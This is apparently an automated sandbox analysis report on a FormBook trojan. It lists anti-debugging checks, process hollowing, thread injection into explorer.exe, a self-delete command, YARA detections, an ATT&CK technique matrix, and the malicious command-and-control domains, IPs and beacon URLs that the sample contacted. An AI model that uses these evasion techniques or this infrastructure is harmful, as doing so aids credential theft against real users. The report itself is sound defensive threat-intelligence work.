Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]	4_2_015C6A50
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C6A50 mov eax, dword ptr fs:[00000030h]	4_2_015C6A50
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163CA72 mov eax, dword ptr fs:[00000030h]	4_2_0163CA72
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0163CA72 mov eax, dword ptr fs:[00000030h]	4_2_0163CA72
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FCA6F mov eax, dword ptr fs:[00000030h]	4_2_015FCA6F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FCA6F mov eax, dword ptr fs:[00000030h]	4_2_015FCA6F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FCA6F mov eax, dword ptr fs:[00000030h]	4_2_015FCA6F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FCA38 mov eax, dword ptr fs:[00000030h]	4_2_015FCA38
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E4A35 mov eax, dword ptr fs:[00000030h]	4_2_015E4A35
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015E4A35 mov eax, dword ptr fs:[00000030h]	4_2_015E4A35
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015EEA2E mov eax, dword ptr fs:[00000030h]	4_2_015EEA2E
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0164CA11 mov eax, dword ptr fs:[00000030h]	4_2_0164CA11
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FCA24 mov eax, dword ptr fs:[00000030h]	4_2_015FCA24
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C0AD0 mov eax, dword ptr fs:[00000030h]	4_2_015C0AD0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F4AD0 mov eax, dword ptr fs:[00000030h]	4_2_015F4AD0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015F4AD0 mov eax, dword ptr fs:[00000030h]	4_2_015F4AD0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01616ACC mov eax, dword ptr fs:[00000030h]	4_2_01616ACC
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01616ACC mov eax, dword ptr fs:[00000030h]	4_2_01616ACC
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01616ACC mov eax, dword ptr fs:[00000030h]	4_2_01616ACC
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015FAAEE mov eax, dword ptr fs:[00000030h]	4_2_015FAAEE

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Code function: 4_2_0040ACE0 LdrLoadDll,

4_2_0040ACE0

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001B0828 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_001B0828
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001B5909 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_001B5909
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001B0987 SetUnhandledExceptionFilter,	2_2_001B0987
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001B0D9B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_001B0D9B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001B0828 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_001B0828
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001B5909 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_001B5909
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001B0987 SetUnhandledExceptionFilter,	4_2_001B0987
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001B0D9B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_001B0D9B

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.216 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 75.2.115.196 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 108.186.24.175 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.17.26.8 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.149.87.45 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.17.158.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 198.177.124.40 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: DE0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\xheuzyg.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Thread register set: target process: 4056			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 4056			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process created: C:\Users\user\AppData\Local\Temp\xheuzyg.exe C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"			Jump to behavior

Source: explorer.exe, 00000005.00000000.1234876566.0000000004880000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1237220182.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3077481783.000000000901E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000002.3706308164.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1234021274.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000002.3706308164.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1234021274.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: explorer.exe, 00000005.00000000.1233732811.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3698889752.0000000000C59000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000005.00000002.3706308164.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1234021274.0000000001440000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\TempState\VimTemp VolumeInformation	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\LocalCache\RNManualFileCache VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: EnumSystemLocalesW,	2_2_001C48BB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: EnumSystemLocalesW,	2_2_001C4906
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: EnumSystemLocalesW,	2_2_001C49A1
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: EnumSystemLocalesW,	2_2_001BC9CF
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_001C4A2C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetLocaleInfoW,	2_2_001C4C7F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_001C4DA8
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_001C460F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetLocaleInfoW,	2_2_001C4EAE
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetLocaleInfoW,	2_2_001BCEFB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_001C4F84
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: EnumSystemLocalesW,	4_2_001C48BB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: EnumSystemLocalesW,	4_2_001C4906
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: EnumSystemLocalesW,	4_2_001C49A1
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: EnumSystemLocalesW,	4_2_001BC9CF
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_001C4A2C
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetLocaleInfoW,	4_2_001C4C7F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_001C4DA8
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_001C460F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetLocaleInfoW,	4_2_001C4EAE
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetLocaleInfoW,	4_2_001BCEFB
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_001C4F84

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Code function: 2_2_001B0A2C cpuid

2_2_001B0A2C

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Code function: 2_2_001B0C3B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_001B0C3B

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

0_2_0040312A

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected NSISDropper

Source: Yara match

File source: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected NSISDropper

Source: Yara match

File source: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Native API	1 DLL Side-Loading	512 Process Injection	1 Rootkit	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Masquerading	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	3 Virtualization/Sandbox Evasion	Security Account Manager	3 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	512 Process Injection	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	3 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Rundll32	DCSync	135 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.FileRepMalware.16340.31219.exe	58%	ReversingLabs	Win32.Trojan.FormBook
SecuriteInfo.com.FileRepMalware.16340.31219.exe	65%	Virustotal		Browse
SecuriteInfo.com.FileRepMalware.16340.31219.exe	100%	Avira	HEUR/AGEN.1337943

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\xheuzyg.exe	58%	ReversingLabs	Win32.Trojan.FormBook

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.umertazkeer.com	12%	Virustotal	Browse
www.wokeeducationhateskids.com	9%	Virustotal	Browse
www.klxcv.xyz	1%	Virustotal	Browse
td-ccm-neg-87-45.wixdns.net	0%	Virustotal	Browse
www.sklm888.com	7%	Virustotal	Browse
www.xuangesmd.com	8%	Virustotal	Browse
glocraze.com	10%	Virustotal	Browse
www.durufilmyapim.com	12%	Virustotal	Browse
www.mzfgwh.top	1%	Virustotal	Browse
www.townstart.shop	11%	Virustotal	Browse
www.gaming-chairs-vn-vi-2885437.fyi	11%	Virustotal	Browse
www.glocraze.com	10%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://microsoft.github.io/Win2D/html/Introduction.htm)	0%	URL Reputation	safe
http://mad4milk.net/	0%	URL Reputation	safe
http://www.e9pf4s.top/ju29/	100%	Avira URL Cloud	phishing
http://www.durufilmyapim.com	100%	Avira URL Cloud	malware
http://www.durufilmyapim.com/ju29/	100%	Avira URL Cloud	malware
http://www.merchascarpamici.com	0%	Avira URL Cloud	safe
http://www.merchascarpamici.comReferer:	0%	Avira URL Cloud	safe
http://schemas.micro	0%	URL Reputation	safe
http://www.durufilmyapim.com/ju29/?M2Mp=6lX0R0Q&Bb_=4V5Ap+fQ4NIPSmUR7w8IZjRflmo1SlImCs0PelLViRgAq2SQgX/qLJiweWaWTZxUZ6zbHBn8KA==	100%	Avira URL Cloud	malware
http://www.umertazkeer.com/ju29/www.mzfgwh.top	100%	Avira URL Cloud	malware
http://www.sklm888.com	100%	Avira URL Cloud	malware
http://www.umertazkeer.com	100%	Avira URL Cloud	malware
http://www.merchascarpamici.com/ju29/:	100%	Avira URL Cloud	malware
http://www.wokeeducationhateskids.com	100%	Avira URL Cloud	malware
http://www.merchascarpamici.com/ju29/	100%	Avira URL Cloud	malware
http://www.mnchentampere.com/ju29/	100%	Avira URL Cloud	malware
http://www.dwijtechnology.com/ju29/www.klxcv.xyz	100%	Avira URL Cloud	malware
http://www.umertazkeer.com/ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q	100%	Avira URL Cloud	malware
http://www.bodacristianyjuani.com	100%	Avira URL Cloud	malware
http://www.mzfgwh.top	0%	Avira URL Cloud	safe
http://www.xuangesmd.com/ju29/	100%	Avira URL Cloud	malware
http://www.xuangesmd.com	100%	Avira URL Cloud	malware
http://www.wokeeducationhateskids.com/ju29/	100%	Avira URL Cloud	malware
http://www.dwijtechnology.com/ju29/	100%	Avira URL Cloud	malware
http://www.klxcv.xyz/ju29/?M2Mp=6lX0R0Q&Bb_=4JvfAS0i2MdEJxbw4NDSiCnJ91CcqWw5bFms	100%	Avira URL Cloud	phishing
http://www.klxcv.xyz/ju29/	100%	Avira URL Cloud	phishing
http://www.townstart.shop/ju29/	100%	Avira URL Cloud	malware
http://www.xuangesmd.comReferer:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.umertazkeer.com	103.224.212.216	true	true	12%, Virustotal, Browse	unknown
www.klxcv.xyz	198.177.124.40	true	true	1%, Virustotal, Browse	unknown
www.wokeeducationhateskids.com	75.2.115.196	true	true	9%, Virustotal, Browse	unknown
td-ccm-neg-87-45.wixdns.net	34.149.87.45	true	true	0%, Virustotal, Browse	unknown
www.sklm888.com	108.186.24.175	true	true	7%, Virustotal, Browse	unknown
www.xuangesmd.com	154.17.26.8	true	true	8%, Virustotal, Browse	unknown
ssl1.prod.systemdragon.com	104.17.158.1	true	true		unknown
glocraze.com	3.33.130.190	true	true	10%, Virustotal, Browse	unknown
www.durufilmyapim.com	unknown	unknown	true	12%, Virustotal, Browse	unknown
www.gaming-chairs-vn-vi-2885437.fyi	unknown	unknown	true	11%, Virustotal, Browse	unknown
www.mzfgwh.top	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.glocraze.com	unknown	unknown	true	10%, Virustotal, Browse	unknown
www.townstart.shop	unknown	unknown	true	11%, Virustotal, Browse	unknown
www.e9pf4s.top	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.durufilmyapim.com/ju29/?M2Mp=6lX0R0Q&Bb_=4V5Ap+fQ4NIPSmUR7w8IZjRflmo1SlImCs0PelLViRgAq2SQgX/qLJiweWaWTZxUZ6zbHBn8KA==	true	Avira URL Cloud: malware	unknown
http://www.umertazkeer.com/ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/Microsoft/SimpleRestClients)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/n-e	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.merchascarpamici.com	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.durufilmyapim.com/ju29/	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.e9pf4s.top/ju29/	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
https://github.com/mwiktorczyk	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/zbtang/React-Native-ViewPager)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?t	explorer.exe, 00000005.00000000.1234977867.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.0000000007276000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.durufilmyapim.com	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://github.com/ProjectSeptemberInc/gl-react)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/facebook/prop-types)	SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.merchascarpamici.comReferer:	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.umertazkeer.com/ju29/www.mzfgwh.top	explorer.exe, 00000005.00000003.2271114826.000000000C4A2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2271434102.000000000C4BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074787427.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2273943272.000000000C54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3745438673.000000000C551000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
